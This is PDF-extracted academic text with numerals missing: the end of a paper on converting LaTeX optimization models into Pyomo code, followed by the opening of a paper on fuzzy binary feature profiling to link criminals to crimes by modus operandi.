helps identify quadratic terms. by automatic conversion of the caret symbol to ∗∗ (as this is one of the ways to denote power of a variable in pyomo language) the split function carefully transfers this information intact to the pyomo model. summations and conditional indexing summation terms need to be enclosed inside parentheses (···), even with a single component. this accelerates identification of the summation terms with clarity and consistency. summations are in a way very different than processing a simplified mathematical expression in the sense that we impose restrictions on how a summation can be used. first of all, the corresponding function to process summations tries to identify how many summation expressions exist in each constraint at a time. their respective indexing expressions are extracted and then sent back to the index identification functions to be processed. the assignment of conditional indexing with the corresponding summation is carefully managed. 
then, the summation commands for the pyomo model file are gradually built. summations can be expressed in the following form, and two different fields can be utilized to exploit conditional indexing (upper and lower brackets): \ sum \ l i m i t s _ { p : x_{n , p } = }^{}( − sb_ {p , k } ) which then compiles to: ∑ p:xn,p= ( −sbp,k) this means that the summation will be executed for all values of p, (that is for p= : |p|) but only when xn,p= at the same time. if we want to use multiple and stacked summations triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (double, triple etc.) we can express them in the same way by adding the indexes for which the summation will be generated, as for example: \ sum \ l i m i t s _ { i , j }^ {} ( x_{ i , j } ) which then compiles to: ∑ i,j(xi,j) and will run for the full cardinality of sets i,j. dynamic (sparse) sets imposed on constraints can be expressed as: x_{ i , j } = y_{ i , j } \ f o r a l l ( i , j ) \ in c \ \ which then compiles to: xi,j =yi,j ∀(i,j)∈c this means that the constraint is being generated only for those values of (i,j) which belong to the dynamic set c. in order to achieve proper and precise processing of summations and conditional indexing, we have built two separate functions assigned for the respective tasks. since specific conditional indexing schemes can take place both for the generation of an entire constraint or just simply for a summation inside a constraint, two different sub-functions process this portion of information. this is done using the \forall command at the end of each constraint, which changes how the indexes are being generated for the vertical expansion of the constraints from a specific index set. concerning summations it is done with the bottom bracket information for horizontal expansion, as we previously saw, for instance, with p :xn,p= . a series of challenges arise when processing summations. for instance, which components are inside a summation symbol? a variable that might appear in two different summations at the same constraint can cause confusion. thus, using a binary list for the full length of variables and parameters present in a constraint we identify the terms which belong to each specific summation. this binary list gets re-initialized for each different summation expression. from the lower bracket of each summation symbol, the parser is expecting to understand the indexes for which the summation is being generated. this is done by either simply stating the indexes in a plain way (for instance a,b) or if a more complex expression is used, the for-loop indexes for the summations are found before the colon symbol (:). constraint indexing at the end of each constraint, the parser identifies the ‘‘ ∀’’’ (\forall) symbol which then helps understand for which indexes the constraints are being sequentially generated (vertical expansion). for instance, ∀(i,j)∈c makes sure that the constraint is not generated for all combinations of index sets i,j, but only the ones appearing in the sparse set c. the sparse sets are being registered also on the fly, if found either inside summation indexing brackets or in the constraint general indexing (after the∀ symbol) by using the keywords \in, \notin. the simplest form of constraint indexing is for instance:∑ j:i =j (xi,j)= ∀i, where the constraint is vertically expanding for all elements of set i and the summation is running for all those values of set j such that i is not equal to j. 
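As an illustration, the conditionally indexed constraint shown above could be generated on the Pyomo side roughly as follows; the model, rule and constraint names are placeholders, the right-hand-side value is arbitrary, and the platform's actual generated code may differ in detail:

from pyomo.environ import AbstractModel, Set, Var, Constraint, Binary

model = AbstractModel()
model.I = Set()
model.J = Set()
model.x = Var(model.I, model.J, domain=Binary)

def assign_rule(m, i):
    # horizontal expansion: the summation runs over j subject to the condition i != j
    return sum(m.x[i, j] for j in m.J if i != j) == 1

# vertical expansion: one constraint is generated for every element of set I
model.assign = Constraint(model.I, rule=assign_rule)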
more advanced cases of constraint conditional indexing are also identified, as long as each expression is separated from the previous one by a comma. for example, in ∀i < |i|, j ≥ i+1 we see each expression separated so that the parser can process the corresponding indexing. three different functions handle identification at constraint level, and the general function that combines these three accepts the whole expression as input. we process each component (split by commas) iteratively with these three functions: (1) to identify the left part (before the operator/reserved keyword/command), (2) the operator and (3) the right-hand part. for example, in i < |i|, the left part is set i, the operator is < and the right-hand part is the cardinality of set i. in this way, by adding a new operator to the list of acceptable operators inside the code, we allow expansion of the supported expressions in a straightforward manner.

an illustrative parsing example

let us now follow the sequential steps that the parser takes to convert a simple example. consider the well-known transportation problem:

minimize ∑_{i,j} (c_{i,j} x_{i,j})

subject to:

∑_{j} (x_{i,j}) ≤ a_i  ∀i
∑_{i} (x_{i,j}) ≥ b_j  ∀j
x ∈ ℝ+

we will now provide an in-depth analysis of how each of the three main parts of the model is processed.

variables

the parser first attempts to locate the line of the .tex model file that contains the variable symbols and their respective domains. this is done by trying to identify any of the previously presented reserved keywords specifically for this section. the parser reaches the bottom line by identifying the keyword mathbbr_+ in this case. commas can separate variables belonging to the same domain, and the corresponding parsing function splits the collection of variables of the same domain and processes them separately. in this case, the parser identifies the domain and then rewinds back inside the string expression to find the variable symbols. it finds no commas, thus we collect only one variable with the symbol x. the platform then builds two python lists with the names of the variables found and their respective types.

objective function

the parser then reads the optimization sense (by locating the objective function expression using the keywords, in this case minimize) and tries to identify any involved variables in the objective function. in a different scenario, where not all of the model variables are present in the objective function, a routine identifies one-by-one all the remaining variables and their associated index sets in the block of the given constraint sets. the parser first attempts to locate any summation symbols. since this is successful, the contained expression is extracted as c_{i,j}x_{i,j}, by locating the parenthesis bounds ( ). in the case of multiple summations, or multiple expressions inside the parentheses, we process them separately. the bounds of the summation symbol (the lower and upper brackets) are then analyzed separately. in this case, the upper one is empty, so the lower one contains all the indexes over which the summation has to scale. separated by commas, a simple extraction gives i,j to be used for the pyomo for-loop in the expression.
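as a concrete illustration of this lower-bracket step, the short python sketch below (ours, not the platform's actual routine) splits a summation's lower bracket into plain for-loop indexes and an optional condition, following the comma and colon conventions described above.

def parse_lower_bracket(lower):
    """split a lower bracket such as 'i,j' or 'p:x_{n,p}=1' into
    (loop_indexes, condition); purely illustrative."""
    lower = lower.strip()
    if ":" in lower:
        # conditional indexing: loop indexes before the colon,
        # the filtering condition after it
        index_part, condition = lower.split(":", 1)
    else:
        index_part, condition = lower, None
    indexes = [tok.strip() for tok in index_part.split(",") if tok.strip()]
    return indexes, condition

# examples mirroring the text
print(parse_lower_bracket("i,j"))           # (['i', 'j'], None)
print(parse_lower_bracket("p:x_{n,p}=1"))   # (['p'], 'x_{n,p}=1')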
there is no colon identified inside the lower bracket of the summation, thus no further identification of conditional indexing is required. a split function is then applied to the extracted mathematical expression c_{i,j}x_{i,j} to begin identification of the involved terms. since there are no operators (∗, +, −, /), we have a list containing only one item: the combined expression. it follows that the underscore characters are used to frame the names of the respective components. it is easy to split on these characters and then create a list to store the pairs of indexes for each component. thus, a sub-routine detects the case of having more than one term in the summation-extracted expression. in this example, c is automatically identified as a parameter because of its associated index set, which was identified with the underscore character, and because it does not belong to the list of variables. the global list of parameters is then updated by adding c, as well as the parameters for the current constraint/objective expression. this helps us clarify which parameters are present in each constraint as well as the set of (unique) parameters for the model thus far, as scanning goes on. once the parameter c and the variable x are identified and registered with their respective index sets, we proceed to read the constraint sets. the parser creates expressions such as the ones shown below for this kind of operation:

model.i = Set(dimen=1)
model.j = Set(dimen=1)
model.c = Param(model.i, model.j, initialize=0)
model.x = Var(model.i, model.j, domain=NonNegativeReals)

since the objective function summation symbol was correctly identified with the respective indexes, the following code is generated and executed:

def obj_expression(model):
    model.f = sum(model.c[i, j] * model.x[i, j]
                  for i in model.i for j in model.j)
    return model.f

model.obj = Objective(rule=obj_expression, sense=minimize)

constraints

since the constraint sets are very similar, for brevity we will only analyze the first one. the parser first locates the constraint type by finding one of the operators ≤, ≥, =. it then splits the constraint into two parts, left and right of this operator. this is done to carefully identify the position of the constraint-type operator for placement into the pyomo constraint expression later on. the first component the parser gives is the list of terms identified raw in the expression ([x_{i,j}, a_i]). parameter a is identified on the fly and, since x is already registered as a variable, the parser proceeds to register only the new parameter by generating the following pyomo expression:

model.a = Param(model.i, initialize=0)

the platform successfully identifies which terms belong to the summation and which do not, and separates them carefully. eventually the ∀ symbol gives the list of indexes for which the constraints are being generated. this portion of information goes into the structure of a pyomo constraint definition, replacing x in the following piece of code:

def axb_constraint_rule_(model, x):

and the full resulting function is:

def axb_constraint_rule_(model, i):
    model.c_ = sum(model.x[i, j] for j in model.j) <= model.a[i]
    return model.c_

model.axbconstraint_ = Constraint(model.i, rule=axb_constraint_rule_)
discussion

developing a parser that would be able to understand almost every different way of writing mathematical models in latex is nearly impossible; however, even after framing the way the user can write down the models, there are challenges to overcome. one of them is the naming policy for variables and parameters. one might assume that names would cause no problems, but they usually do, because in formal modeling languages the user states the names and the types of every component of the problem. starting from the sense of the objective function, to the names and types of the variables and parameters, as well as their respective sizes and the names of the index sets, everything is explicitly defined. this is not the case in this platform; the parser recognizes the parameters and index sets with no prior given information. this in turn imposes trade-offs on the way we write the mathematical notation. for instance, multiple index sets have to be separated by commas, as in x_{i,j}, instead of writing x_{ij}. on the other hand, using a symbolic representation of the models in latex enables the user to quickly identify errors in the description of the model, the involved variables, parameters or their mathematical relationships therein, as opposed to trying to debug models that have been developed directly in a programming language or in an aml, which would make the detection of such errors or typos more challenging.

by scanning a constraint, the parser quickly identifies, as mentioned, the associated variables. in many cases parameters and variables may have multiple occurrences in the same constraint. this creates a challenging environment for locating the relationships of the parameters and the variables, since they appear in multiple locations inside the string expressions and in different ways. on top of this, the name of a parameter can cause identification problems because it might be a sub/super-set of the name of another parameter, e.g., parameter ab and parameter abc. therefore naming conflicts are carefully resolved by the platform by meticulously identifying the exact location and occurrences of each term.

the cpu time required for each step in the modeling process of the platform (conversion from latex to pyomo, pyomo model generation, solver) can be found in the supplementary information. it can be noted that the parser is the least time-consuming step, which clearly demonstrates the efficiency of the platform. the pyomo model generation and solver (cplex in our measurements) steps and their associated cpu time are completely outside of the parser's control. however, it is essential to get an idea of how these timings compare to each other with the addition of this extra, higher level of abstraction at the beginning of the modeling process.

challenges also arise in locating which of the terms appearing in a constraint belong to summations, and to which summations; especially when items have multiple occurrences inside a constraint, a unique identification is needed so as to include a parameter (or a variable) inside a specific summation or not. we addressed this with the previously introduced binary lists: for each summation symbol, the items activated (1) are included in that summation and the items left at 0 are not, and the list is generated for each different summation within the expression.
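as an illustration of this bookkeeping (our sketch, not the platform's actual data structure), a binary membership list over a constraint's terms can be built per summation from the character spans of each term occurrence; the term and span representations below are hypothetical.

def summation_membership(terms, summation_spans):
    """for each summation span, build a binary list over a constraint's terms:
    1 if the term occurrence lies inside that summation, 0 otherwise.
    terms: list of (name, start, end) character positions in the expression.
    summation_spans: list of (start, end) spans of each summation body."""
    memberships = []
    for s_start, s_end in summation_spans:
        memberships.append([1 if s_start <= t_start and t_end <= s_end else 0
                            for _name, t_start, t_end in terms])
    return memberships

# toy example: x occurs twice, but only its first occurrence is inside the sum
terms = [("y", 0, 5), ("c", 28, 35), ("x", 36, 43), ("x", 48, 53)]
sums = [(8, 44)]
print(summation_membership(terms, sums))   # -> [[0, 1, 1, 0]]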
additionally, another challenge is the extension of the platform to support nonlinear terms, where each term itself can be a combination of various operators and mathematical functions. finally, it is worth mentioning that the number of lines/characters required to represent a model in latex is substantially smaller than for the equivalent model in pyomo. in this respect, the platform accelerates the model development process.

conclusions

we presented a platform for rapid model generation using latex as the input language for mathematical programming, starting with the classes of lp, milp and miqp. the platform is based on python and parses the input to pyomo to successfully solve the underlying optimization problems. it uses a simple gui to facilitate model and data input, based on django as the web framework. the user can exploit locally installed solvers or redirect to the neos server. this prototype platform delivers transparency and clarity, speeds up the model design and development process (by significantly reducing the characters required to type the input models) and abstracts the syntax away from programming languages and amls. it therefore delivers reproducibility and the ability to replicate scientific work in an effective manner for an audience not necessarily versed in coding. future work could involve expansion to support nonlinear terms as well as differential and algebraic equations, sanity checking and error catching on input, the ability to embed explanatory comments in the input model file which would transfer to the target aml, extending the functionality concerning bounds on the variables, and adding further support for built-in latex commands (such as \left[ ]) which would capture more complex mathematical relationships.

acknowledgements

we would like to thank prof. eric fraga and dr. aristotelis kittas for useful discussions.

additional information and declarations

funding
this work was supported by the leverhulme trust under grant (no. rpg- - ) and the uk engineering and physical sciences research council (no. ep/m / ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
leverhulme trust under grant: rpg- - .
uk engineering and physical sciences research council: ep/m / .

competing interests
the authors declare there are no competing interests.

author contributions
• charalampos p. triantafyllidis performed the experiments, analyzed the data, prepared figures and/or tables, performed the computational work, authored or reviewed drafts of the paper.
• lazaros g. papageorgiou conceived and designed the experiments, analyzed the data, performed the computational work, authored or reviewed drafts of the paper, approved the final draft.

data deposition
the following information was supplied regarding data availability:
the raw data used for the examples presented in this paper are provided in the supplemental file.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
submitted november accepted may published june corresponding author mahawaga arachchige pathum chamikara, pathumchamikara@gmail.com academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright chamikara et al. distributed under creative commons cc-by .
open access fuzzy based binary feature profiling for modus operandi analysis mahawaga arachchige pathum chamikara , , akalanka galappaththi , roshan dharshana yapa , , ruwan dharshana nawarathna , , saluka ranasinghe kodituwakku , , jagath gunatilake , , aththanapola arachchilage chathranee anumitha jayathilake and liwan liyanage postgraduate institute of science (pgis), university of peradeniya, peradeniya, sri lanka faculty of science, university of peradeniya, peradeniya, sri lanka school of computing, engineering and mathematics, university of western sydney, western sydney, nsw, australia abstract it is a well-known fact that some criminals follow perpetual methods of operations known as modi operandi. modus operandi is a commonly used term to describe the habits in committing crimes. these modi operandi are used in relating criminals to crimes for which the suspects have not yet been recognized. this paper presents the design, implementation and evaluation of a new method to find connections between crimes and criminals using modi operandi. the method involves generating a feature matrix for a particular criminal based on the flow of events of his/her previous convictions. then, based on the feature matrix, two representative modi operandi are generated: complete modus operandi and dynamic modus operandi. these two representative modi operandi are compared with the flow of events of the crime at hand, in order to generate two other outputs: completeness probability (cp) and deviation probability (dp). cp and dp are used as inputs to a fuzzy inference system to generate a score which is used in providing a measurement for the similarity between the suspect and the crime at hand. the method was evaluated using actual crime data and ten other open data sets. in addition, comparison with nine other classification algorithms showed that the proposed method performs competitively with other related methods proving that the performance of the new method is at an acceptable level. subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning keywords modus operandi analysis, fuzzy inference systems, binary feature analysis, classification, association rule mining introduction scientists have long played a role in examining deviant behavior in society. ‘‘deviance behaviour’’ is a term used by scientists to refer to some form of ‘‘rule-breaking’’ behaviour (holdaway, ). it can be the behaviour of violating a social norm or the law. criminal behaviour is also a form of deviance, one that is defined as the breaking of legal rules. nevertheless, there is a difference between deviance and crime. deviance involves breaking a norm and evoking a negative reaction from others. crime is a deviance that how to cite this article chamikara et al. ( ), fuzzy based binary feature profiling for modus operandi analysis. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:pathumchamikara@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. breaks a law, which is a norm stipulated and enforced by government bodies (holdaway, ). however, crimes negatively affect society. therefore, law enforcement authorities take necessary actions to mitigate crimes in an environment where high crime frequencies are observed each year. 
in this exercise, the application of technology for crime analysis is being widened in the world. locard’s exchange principle states that every contact of the perpetrators of a crime scene leaves a trace. the perpetrators will both bring something into the scene and leave with something from the scene (chisum & turvey, ). however, the cognitive abilities of criminals will always make them minimize their risks of apprehension by conducting the perfect crime and maximizing their gain (paternoster & bachman, ). modus operandi or method of operation such as preparation actions, crime methods and weapons are frequently used in criminal profiling because the past crime trends show that, after criminals get used to a certain method of operation, they try to use the same modus operandi in committing his/her next crime (palmiotto, ). the criminals develop a set of actions during the performance of a series of crimes which we refer to as ‘‘modus operandi’’ (mo). mo is developed with the crimes he/she commits and the nature of trying to stick with the developed mo that has worked throughout the previous crimes (douglas & douglas, ). in any criminal career, the mo happens to evolve, no matter what the circumstances. also, it is a common behaviour that serial offenders tend to exhibit significant behaviour known as his/her signature. therefore, mos of criminals play a major role in investigating crimes (douglas & douglas, ). it is a known fact that features such as criminal signature and physical appearance are used in crime investigations in almost all the police departments around the world. sri lanka police also use mos of criminals to identify the suspects who have conducted crimes. currently sri lanka police use a manual crime recording and investigation system. this manual system has many problems such as data redundancy, inefficiency, tediousness, inability to support crime investigation and many other problems which are associated with a conventional manual system. to overcome these problems, a web-based framework was proposed with geographical information support containing a centralized database for crime data storage and retrieval, named sl-cidss: sri lanka crime investigation decision support system (chamikara et al., ). the proposed system accompanies a collection of data mining algorithms which effectively support the crime investigation process. fuzzy based binary feature profiling (bfpm) for modus operandi analysis is one novel algorithm which is integrated with the system to provide an effective way to find the similarity between crimes and criminals. according to the penal code of sri lanka first enacted in and amended subsequently several times in later years (the ‘lectric law library, ), sri lanka police classifies crimes into two categories: grave crimes and minor offences. until , grave crimes were classified under crime categories and in another new crime categories were introduced, making it categories of grave crime types. kidnapping, fraud or mischief causing damage greater than , rupees, burglary, grievous hurt, hurt by sharp weapon, homicide, rape, robbery, cheating by trust, theft are of the most frequent crime types. to identify the patterns involved in crimes, a collection of subtypes were identified under these crime types. these subtypes have been created mainly for the purpose of modus chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure relationship between main crime type, subtypes and crime flows. 
operandi analysis. most frequent behaviors of criminals/crimes are considered as crime subtypes. when a crime is logged in the grave crime record (gcr) book, it is classified under one of the main categories. but, under the section of ‘‘nature of crime’’ in the gcr book, the police officers record the flow of the crime incident including the subtypes. a subtype is a sub category of one of the main crime types. for investigation, the nature of the crime is broken into subtypes and flows according to their frequency of occurrence and uniqueness. these sub categorizations have been introduced mainly to minimize the broadness of main type and to improve clarity. figure depicts the relationship of the subtypes and flows where there can be a flow of events to a crime recorded as one of the main crime types. for the simplicity and easy handling of data, the investigators have provided subtype codes and flow codes. the flow of events provides a modus operandi which is most of the time unique to an offender. each subtype is provided with a code under the main type, to make the crime investigation process easier. for example, rob/s denotes a subtype that is highway robbery; here rob denotes the main type under which the corresponding subtype appears. in this case, it is robbery. crime types are further subdivided into sub types to make the analysis and processing simpler. in this manner, crime subtypes and flows have been identified under all the crime types. the space for adding more subtypes and flows under these crime types exists. a new subtype or a flow is introduced to a particular main crime, if the same subtype or the flow happens to persist for a prolonged time. this paper proposes a novel method of criminal profiling using modus operandi which can be used to identify associations between crimes and criminals. the method is based on a new technique named, ‘‘binary feature vector profiling.’’ key relationships between a criminal and the previous convictions are analyzed using binary feature profiling and association rule mining techniques. due to the impreciseness and vagueness of these extracted attributes, a fuzzy inference system is used in making the final decision. the newly proposed method was adapted into a classification algorithm in order to test its accuracy. an actual crime data set was used in testing the performance of the newly proposed method and it was compared against nine well-established classification algorithms using ten open data sets. the results confirmed that the proposed method produce competitive results compared to the other nine classification algorithms. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the rest of the paper is organized as follows. the related work section presents a summary of the work that has been conducted on modus operandi analysis as well as a brief discussion on crime investigation using link analysis and association mining in general. the materials and methods section discusses the main steps of the newly proposed algorithm. next, the results and discussion section provides a validation and performance evaluation of the newly proposed method along with a performance comparison with nine other classification algorithms. finally, some concluding remarks and future enhancements are outlined in the conclusion section. related work literature shows many methods which have been developed in the area of automated crime investigation. 
our major concern has been laid upon the research carried out on crime investigation using association mining as our research considers on developing a model to find the associations between the criminals and the crimes depending on the modes operandi. bennell & canter ( ) have proposed a method to use statistical models to test directly the police practice of utilizing modus operandi to link crimes to a common offender. the results indicated that certain features such as the distance between burglary locations, lead to high levels of predictive accuracy. bennell & jones ( ) have tried to determine if readily available information about commercial and residential serial burglaries, in the form of the offender’s modus operandi, provides a statistically significant basis for accurately linking crimes committed by the same offenders. leclerc, proulx & beauregard ( ) have reviewed the theoretical, empirical, and practical implications related to the modus operandi of sexual offenders against children. they have presented the rational choice perspective in criminology followed by descriptive studies aimed specifically at providing information on modus operandi of sexual offenders against children. clustering crimes, finding links between crimes, profiling offenders and criminal network detection are some of the common areas where data mining is applied in crime analysis (oatley & ewwart, ; king & sutton, ; borg et al., ). association analysis, classification and prediction, cluster analysis, and outlier analysis are some of the traditional data mining techniques which can be used to identify patterns in structured data. offender profiling is a methodology which is used in profiling unknown criminals or offenders. the purpose of offender profiling is to identify the socio-demographic characteristics of an offender based on information available at the crime scene (mokros & alison, ; canter et al., ). association rule mining discovers the items in databases which occur frequently and present them as rules. since this method is often used in market basket analysis to find which products are bought with what other products, it can also be used to find associated crimes conducted with what other crimes. here, the rules are mainly evaluated by the two probability measures, support and confidence (agrawal, imielinkski & swami, ; yi et al., ). association rule mining can also be used to identify the environmental factors that affect crimes using the geographical references (koperski & han, ). incident association mining and entity association mining are two applications of association rule mining. incident association mining can be used to find the crimes committed by the same offender and then the unresolved crimes can be linked to find the chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. offender who committed them. therefore, this technique is normally used to solve serial crimes like serial sexual offenses and serial homicides (chen, ). similarity-based association mining and outlier-based association mining are two approaches used in incident association mining. similarity-based association mining is used mainly to compare the features of a crime with the criminal’s behavioral patterns which are referred as modus operandi or behavioral signature. 
in outlier-based association mining, crime associations will be created on the fact that both the crime and the criminal have the possibility of having some distinctive feature or a deviant behavior (lin & brown, ). entity association mining/link analysis is the task of finding and charting associations between crime entities such as persons, weapons, and organizations. the purpose of this technique is to find out how crime entities that appear to be unrelated at the surface, are actually linked to each other (chen, ). link analysis is also used as one of the most applicable methods in social network analysis (berry & linoff, ) in finding crime groups, gate keepers and leaders (chen et al., ). attribution can be used to link crimes to offenders. if two offences in different places involve the same specific type, those may be readily attributed to the same offender (oatley & ewwart, ).there are three types of link analysis approaches, namely heuristic-based, statistical-based and template-based (chen, ). sequential pattern mining is also a similar technique to association rule mining. this method discovers frequently occurring items from a set of transactions occurred at different times (chen et al., ). deviation detection detects data that deviates significantly from the rest of the data which is analyzed. this is also called outlier detection, and is used in fraud detection (chen et al., ; capozzoli, lauro & khan, ). in classification, the data points will be assigned to a set of predefined classes of data by identifying a set of common properties among them. this technique is often used to predict crime trends. classification needs a reasonably complete set of training and testing data since a high degree of missing data would limit the prediction accuracy (chen et al., ). classification comes under supervised learning method (chen, ; chikersal, poria & cambria, ) which includes methods such as bayesian models, decision trees, artificial neural networks (chen, ) and support vector machines. string comparison techniques are used to detect the similarity between the records. classification algorithms compare the database record pairs and determine the similarity among them. this concept can be used to avoid deceptive offender profiles. information of offenders such as name, address, etc. might be deceptive and therefore the crime database might contain multiple records of the same offender. this makes the process of identification of their true identity difficult (chen et al., ). systems and methods this section provides a description about the systems and methods used in developing the fuzzy based binary feature profiling for modus operandi analysis. first, an overview about how sl-cidss captures the logics of modus operandi is explained. then a detailed description about the steps of the newly proposed algorithm is explained. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure crime flow entity arrangement in sl-cidss. figure shows how sl-cidss database captures the crime types and subtypes. a crime record has a crime record flow. typically, a crime is committed by a criminal and a particular accused might commit one or more crimes. a crime record can be of one the crime types. a particular crime record will be considered under one main crime type with the highest precedence in the order of seriousness. 
for example, a crime incident that includes a murder and a robbery will be categorized as a murder even though a robbery has also taken place; but in the nature-of-crime section, all crimes following the main type will be stated. therefore, the crime record flow captures all the steps of the crime as a recorded sequence of steps. the crime flows that have been previously registered are mapped under crime flow code. also, a particular crime record instance can contain multiple sub types, which are recorded as crime sub type. the special category captures the crimes with special features, such as crimes occurring at the same location or retail shop. a crime may involve several special categories, which are saved in the crime special category. the accused entity records the information of suspects and accused, and they are related to crime through the crime suspect entity.

as the first step of the newly employed method, a feature matrix is generated, resulting in a binary matrix representing the crime flows. this binary feature matrix is composed of the binary patterns generated on the previous convictions of a particular criminal/suspect. this binary form of the feature matrix allows the direct application of computer algorithms such as apriori-based association rule mining, and the reduced complexity of the binary feature matrices allows easy manipulation of the categorical and continuous-valued features. the figure below outlines the steps of the proposed mo analysis algorithm.

figure: steps of the newly employed algorithm.

generating the feature matrix

the table below shows how the feature vectors are generated and provides the way to generate modi operandi of criminals as binary sequences. according to the table, the events of the crime scene are observed starting from its crime type. after a particular crime type is identified, the feature vectors are updated with ones for each subtype and flow code that is present in the crime or suspect's modus operandi; the vectors are filled with zeros in the places with which the modus operandi has no contact. the column names of the feature matrix are generated in such a way that they cover the collection of main types, sub types, crime flows and special categories at hand. for example, if we consider the list of crime types, subtypes, crime flows and special categories in the table below, it results in 21-bit feature vectors, as shown in the last two columns. in this manner we can produce binary mo patterns based on the crimes committed by different criminals, as shown in the last two columns of the table. according to the table, suspect 1 has committed a robbery with the subtypes abd/s (an abduction of a child from the legal guardian) and rob/s (an organized vehicle robbery) and the flows rob/f (identity cards have been shown) and rob/f (the accused has been wearing uniforms). suspect 2 has committed a house breaking with the sub type bgl/s (use of stealth) and the flows bgl/f (entering from the window) and bgl/f (removing grills).

table: an instance of feature selection for the feature matrix generation (the last two columns of the original table hold the resulting bit values for suspect 1 and suspect 2).
crime types: hb – house breaking; hk – hurt by knife; rb – robbery; th – theft.
sub types: abd/s – abduction from the legal guardian; abd/s – abducting to marry; abd/s – abducting for sexual harassment; bgl/s – use of stealth; bgl/s – burglary in business places; rob/s – organized vehicle robbery.
crime flows: bgl/f – entering from the window; bgl/f – entering from the fanlights; bgl/f – removing grills; bgl/f – breaking glasses; rob/f – showing identity cards; rob/f – wearing uniforms; rob/f – robbery using identity cards, uniforms and chains; rob/f – seizing inmates; rob/f – appearing as cid officers.
special category: retailer – attacking/robbing retailer's stores; retailer – attacking/robbing retailer's stores.

the table below shows a feature matrix of binary patterns generated by considering the previous convictions of suspect 1, assuming that he has conducted another robbery (conviction 2). ct, st, fl and sc represent the abbreviations for "crime type," "sub type," "crime flow" and "special category" respectively.

table: feature matrix for suspect 1, generated using the selected modus operandi attributes above (columns: crime types ct, sub types st, crime flows fl, special categories sc; rows: conviction 1, conviction 2).
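as a minimal illustration of this encoding step (our sketch, using a small hypothetical vocabulary of codes rather than the full sl-cidss list), a binary feature vector can be built by marking 1 for every crime type, subtype, flow and special category observed in a recorded crime:

# hypothetical, abbreviated vocabulary of crime-flow elements (the real
# system uses the full list of types, subtypes, flows and special categories)
COLUMNS = ["hb", "rb", "abd/s1", "rob/s1", "bgl/s1",
           "bgl/f1", "bgl/f3", "rob/f1", "rob/f2", "retailer1"]

def encode_mo(observed_elements):
    """return a binary feature vector: 1 where the element was observed."""
    observed = set(observed_elements)
    return [1 if col in observed else 0 for col in COLUMNS]

# suspect 1: robbery with identity cards and uniforms (illustrative codes)
suspect1 = encode_mo(["rb", "abd/s1", "rob/s1", "rob/f1", "rob/f2"])
# suspect 2: house breaking using stealth, via the window, removing grills
suspect2 = encode_mo(["hb", "bgl/s1", "bgl/f1", "bgl/f3"])
print(suspect1)   # [0, 1, 1, 1, 0, 0, 0, 1, 1, 0]
print(suspect2)   # [1, 0, 0, 0, 1, 1, 1, 0, 0, 0]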
generating the dynamic mos (dmos) of the criminals

a dynamic mo is a binary feature vector which is generated from the bit patterns of the feature matrix of a particular criminal. the main purpose of the dmo is to obtain a criminal-specific crime flow which captures the crime patterns that are frequently followed by that criminal. it is named the dynamic modus operandi as it is subject to change when new crime flows are added to the feature matrix; therefore, it addresses the changing nature of the patterns used by criminals in committing crimes. first, a frequency threshold is generated using characteristic features of the feature matrix at hand, which is the matrix of all crimes committed by the same criminal under consideration. the matrix shown below is an example of a feature matrix generated on the previous convictions of a criminal. for the sake of simplicity, let us consider a feature matrix of 10 columns. if we consider a–j as crime flow features of the corresponding mos, we can see that in the first mo the criminal has followed a crime flow of a-e-f-g-i. the same criminal has followed a crime flow of a-d-f-g-i in his second crime. likewise, the other two crime flows are a-e-f-h-i and a-d-f-g-h-i respectively.

table: feature matrix generated on four previous convictions of a criminal.
      a b c d e f g h i j
mo 1: 1 0 0 0 1 1 1 0 1 0
mo 2: 1 0 0 1 0 1 1 0 1 0
mo 3: 1 0 0 0 1 1 0 1 1 0
mo 4: 1 0 0 1 0 1 1 1 1 0

the dmo of a particular criminal is generated using the apriori method (adamo, ). the apriori method is used to find the crime entities meeting the frequency threshold (frt), which is generated according to the expressions below; a demonstration of the generation of d on the properties of this feature matrix is given by the column-wise addition shown further below.

d = { d | d = \sum_{i=1}^{n} y_i }
frt = m_d / n

where d = the vector of distinct column frequencies of the feature matrix, y_i = the cells in each column, m_d = the median of d, n = Σf = the number of values or total frequencies, c = the cumulative frequency of the median class, and h = the class interval size.
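a small numeric sketch of this threshold computation (ours, assuming the binary feature matrix is held in a numpy array) reproduces the d and frt definitions above:

import numpy as np

def frequency_threshold(feature_matrix):
    """compute frt = median(d) / number_of_rows, where d is the set of
    distinct column-wise sums of the binary feature matrix."""
    m = np.asarray(feature_matrix)
    column_sums = m.sum(axis=0)       # one frequency per column
    d = np.unique(column_sums)        # distinct column frequencies
    return float(np.median(d)) / m.shape[0]

# the four example crime flows a-e-f-g-i, a-d-f-g-i, a-e-f-h-i, a-d-f-g-h-i
mos = [[1, 0, 0, 0, 1, 1, 1, 0, 1, 0],
       [1, 0, 0, 1, 0, 1, 1, 0, 1, 0],
       [1, 0, 0, 0, 1, 1, 0, 1, 1, 0],
       [1, 0, 0, 1, 0, 1, 1, 1, 1, 0]]
print(frequency_threshold(mos))       # 0.625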
